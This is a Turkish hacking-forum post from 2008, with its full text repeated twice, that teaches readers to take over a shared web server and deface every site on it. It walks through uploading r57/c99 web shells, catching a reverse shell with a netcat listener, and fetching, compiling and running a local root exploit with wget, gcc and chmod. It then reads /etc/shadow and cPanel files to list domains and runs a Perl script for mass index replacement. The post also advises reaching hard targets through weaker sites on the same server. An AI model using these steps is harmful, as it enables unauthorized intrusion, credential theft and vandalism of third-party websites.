EnTeR_kEy
05-03-2008, 11:17 AM
SeLamın Aleykum
arkadasLar gercekten cok yararLı bır yontem ,konu umarım ışinıze yarar ,yorumLarınızı esırgemeyın.
gerekli malzemeler.
perl(pc nizinde kurulmuş olsun)
shell(r57,c99 vs.)
netcat(kurulum anlatılacak).
index
ve ip adresimizi ögreniyoruz.
başlıyoruz:
herkes artık web site açıkları ile c99, r57 gibi shell ilerle siteye index ata biliyor. şimdi bizim amacımız o basit sitelerden server sızmak ve server daki bütün sitelere index atmak .
öncelikle modemimizin configrasyon ayarlarına girip kendimize bir port açıyoruz.
netcat: öncelikle sitemimize kuralım. google dan aratıp pc mize indiriyoruz. ve içindekilerin hepsini windows/system32 içinne atalım. ve başlat/çalıştır cmd deyip karşımıza gelen ekranda bi nc -vv -l -p (port no) yukarda açmış oldumuz portu burda port no kısmına yazıyoruz. ve enter diyoruz.listening on [any] yazısı gelecek. netcat artık hazır. pencere aşagıya indiriyoruz ve bekletiyoruz.
c99 ile baglandıgımız siteye gelip upload kısmında r57.txt olan shell imizi masa üstünde r57.php yapıp siteye upload ediyoruz. ve upload ettgimiz dizini üzerine geliyoruz. r57.php sitede çalıştırıyoruz.
şimdi r57 shel imizin en alt kısmında bir back connect var. burdaki ip ve portu siliyoruz. ip adresimi internetten ögreniyoruz ve biraz önce yukarda açmış oldugumuz portu buraya yazıyoruz. ve connect diyoruz. ve bekliyoruz.
tekrar netcat dönüyoruz . bi kaç dk sonra server özellikleri yazı olarak baglanacak . netcat sisteme.
şimdi server özeligini herhangi bir exploit sitesinde aratıp buluyoruz exploit ve masa üstüne exploitadı.c diye kaydediyoruz. şimdi bu kaydettigimiz exploiti aynı kendisitemize shell upload eder gibi sitenize upload ediyorsunuz.
şimdi bu exploit derleyelim yine netcat penceresinde wget Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. (Sitedeki Linkleri Sadece Üyelerimiz Görebilir..) şeklinde exploit çekiyoruz. biraz bekledikten sonra ok. 100% gibi yazılar yazcak. işlem tama demek bu .
devam....
şimdi bunu derleyelim gcc -o root exploitadı.c diyoruz ve exploitimiz root adını almış oluyor.
şimdi yine aynı ekranda chmod 777 diyerek explotimize tam yetki veriyoruz.
ve...
./root diyerek exploitimizi çalıştırıyoruz. ve sonra id diyerek duruma bakıyoruz.uid:0(root) yazıyorsa exploitimizi işe yaradı.
şimdi serverdaki sitelere bakalım kaç tane ))))
isster aynı pncerede interseniz siteye yedirdigimi ve upload ettgimiz r57 üzerinde
şu satırlara giriyoruz.
/var/cpanel
etc/shadow
/var/named
bu satırlardan birisi bize serverdaki siteleri listeleyecek ve listenen domainleri not defterine kaydedip sondaki db siliyoruz.
şimdi tüm sitelere index atmak için bir perl exploit ihtiyacımız var dökümanın sonunda verecegim exploiti. perl exploitimizi sitye upload ettgimiz r57 üzerinden takrar siteye upload ediyoruz ve . tekrar netcat ekranına kaldımız yere dönüyoruz. netcar ile siteye baglı oldgumuz için istedgimizi yaparız explotimiz sayesinde şimdi . perl exploitadı.pl diyoruz ve biraz bekledikten sonra /tmp/index.html gibi bir birşey yazcak en sonda bu demek oluyorki burdaki index i tüm sitelre kopyala.
evet şimdi hazırladıgımız index i yine r57 upload ve exploit.c upload ettgimiz yere upload ediyoruz. upload ettgimiz yerin en üstünde (pewd)kısmanda nere upload ettgimiz yazar sonuna index.htm veya html yapmanız yeterli.
perl exploitadı.pl /tmp/index.html eneter diyoruz ve artık bütün sitelerde index imizi var. domainleri not ettgimiz yerden siteleri kontrol ediyoruz.
perl exploit burdan alabilirsiniz:
Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. (Sitedeki Linkleri Sadece Üyelerimiz Görebilir..)
sorusu olan varsa yazsın.
Alıntıdır ... Güzel Bilgiler olduğu için paylaştım ...
Yararları ; Hackleyemediğiniz büyük sitelere whois çekin sonra sitenin server indeki siteleri öğrenin sonra onların arasından kolay olanını seçin sonra kolay olanını hackleyin siteye shell upload edin sonra shell den server a geçin sonra server daki büyün siteleri de hedef site ile birlikte hackleyin
sayqıLaımLa HACKED By £nTeR_k€y
-------------------------------------------------
سْــــــــــــــــــــــمِ اﷲِارَّحْمَنِ ارَّحِي.
IRAK çok mu Irak ???
O?uzam, TÜRKmenem… Bayatlardan TÜRKmenem…
Damarlar?ndaki asil kan, asl?na çekti?in ?rk menem…
Yapra??n as?l? dallar, gövdeni ta??yan kök menem…
Yolunu gözleyen yar, a?k?nla çarpan ürek menem…
Can içre canan bilmi?em gavim garda?, nerdesen…
arkadasLar gercekten cok yararLı bır yontem ,konu umarım ışinıze yarar ,yorumLarınızı esırgemeyın.
gerekli malzemeler.
perl(pc nizinde kurulmuş olsun)
shell(r57,c99 vs.)
netcat(kurulum anlatılacak).
index
ve ip adresimizi ögreniyoruz.
başlıyoruz:
herkes artık web site açıkları ile c99, r57 gibi shell ilerle siteye index ata biliyor. şimdi bizim amacımız o basit sitelerden server sızmak ve server daki bütün sitelere index atmak .
öncelikle modemimizin configrasyon ayarlarına girip kendimize bir port açıyoruz.
netcat: öncelikle sitemimize kuralım. google dan aratıp pc mize indiriyoruz. ve içindekilerin hepsini windows/system32 içinne atalım. ve başlat/çalıştır cmd deyip karşımıza gelen ekranda bi nc -vv -l -p (port no) yukarda açmış oldumuz portu burda port no kısmına yazıyoruz. ve enter diyoruz.listening on [any] yazısı gelecek. netcat artık hazır. pencere aşagıya indiriyoruz ve bekletiyoruz.
c99 ile baglandıgımız siteye gelip upload kısmında r57.txt olan shell imizi masa üstünde r57.php yapıp siteye upload ediyoruz. ve upload ettgimiz dizini üzerine geliyoruz. r57.php sitede çalıştırıyoruz.
şimdi r57 shel imizin en alt kısmında bir back connect var. burdaki ip ve portu siliyoruz. ip adresimi internetten ögreniyoruz ve biraz önce yukarda açmış oldugumuz portu buraya yazıyoruz. ve connect diyoruz. ve bekliyoruz.
tekrar netcat dönüyoruz . bi kaç dk sonra server özellikleri yazı olarak baglanacak . netcat sisteme.
şimdi server özeligini herhangi bir exploit sitesinde aratıp buluyoruz exploit ve masa üstüne exploitadı.c diye kaydediyoruz. şimdi bu kaydettigimiz exploiti aynı kendisitemize shell upload eder gibi sitenize upload ediyorsunuz.
şimdi bu exploit derleyelim yine netcat penceresinde wget Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. (Sitedeki Linkleri Sadece Üyelerimiz Görebilir..) şeklinde exploit çekiyoruz. biraz bekledikten sonra ok. 100% gibi yazılar yazcak. işlem tama demek bu .
devam....
şimdi bunu derleyelim gcc -o root exploitadı.c diyoruz ve exploitimiz root adını almış oluyor.
şimdi yine aynı ekranda chmod 777 diyerek explotimize tam yetki veriyoruz.
ve...
./root diyerek exploitimizi çalıştırıyoruz. ve sonra id diyerek duruma bakıyoruz.uid:0(root) yazıyorsa exploitimizi işe yaradı.
şimdi serverdaki sitelere bakalım kaç tane ))))
isster aynı pncerede interseniz siteye yedirdigimi ve upload ettgimiz r57 üzerinde
şu satırlara giriyoruz.
/var/cpanel
etc/shadow
/var/named
bu satırlardan birisi bize serverdaki siteleri listeleyecek ve listenen domainleri not defterine kaydedip sondaki db siliyoruz.
şimdi tüm sitelere index atmak için bir perl exploit ihtiyacımız var dökümanın sonunda verecegim exploiti. perl exploitimizi sitye upload ettgimiz r57 üzerinden takrar siteye upload ediyoruz ve . tekrar netcat ekranına kaldımız yere dönüyoruz. netcar ile siteye baglı oldgumuz için istedgimizi yaparız explotimiz sayesinde şimdi . perl exploitadı.pl diyoruz ve biraz bekledikten sonra /tmp/index.html gibi bir birşey yazcak en sonda bu demek oluyorki burdaki index i tüm sitelre kopyala.
evet şimdi hazırladıgımız index i yine r57 upload ve exploit.c upload ettgimiz yere upload ediyoruz. upload ettgimiz yerin en üstünde (pewd)kısmanda nere upload ettgimiz yazar sonuna index.htm veya html yapmanız yeterli.
perl exploitadı.pl /tmp/index.html eneter diyoruz ve artık bütün sitelerde index imizi var. domainleri not ettgimiz yerden siteleri kontrol ediyoruz.
perl exploit burdan alabilirsiniz:
Sitedeki Linkleri Sadece Üyelerimiz Görebilir.. (Sitedeki Linkleri Sadece Üyelerimiz Görebilir..)
sorusu olan varsa yazsın.
Alıntıdır ... Güzel Bilgiler olduğu için paylaştım ...
Yararları ; Hackleyemediğiniz büyük sitelere whois çekin sonra sitenin server indeki siteleri öğrenin sonra onların arasından kolay olanını seçin sonra kolay olanını hackleyin siteye shell upload edin sonra shell den server a geçin sonra server daki büyün siteleri de hedef site ile birlikte hackleyin
sayqıLaımLa HACKED By £nTeR_k€y
-------------------------------------------------
سْــــــــــــــــــــــمِ اﷲِارَّحْمَنِ ارَّحِي.
IRAK çok mu Irak ???
O?uzam, TÜRKmenem… Bayatlardan TÜRKmenem…
Damarlar?ndaki asil kan, asl?na çekti?in ?rk menem…
Yapra??n as?l? dallar, gövdeni ta??yan kök menem…
Yolunu gözleyen yar, a?k?nla çarpan ürek menem…
Can içre canan bilmi?em gavim garda?, nerdesen…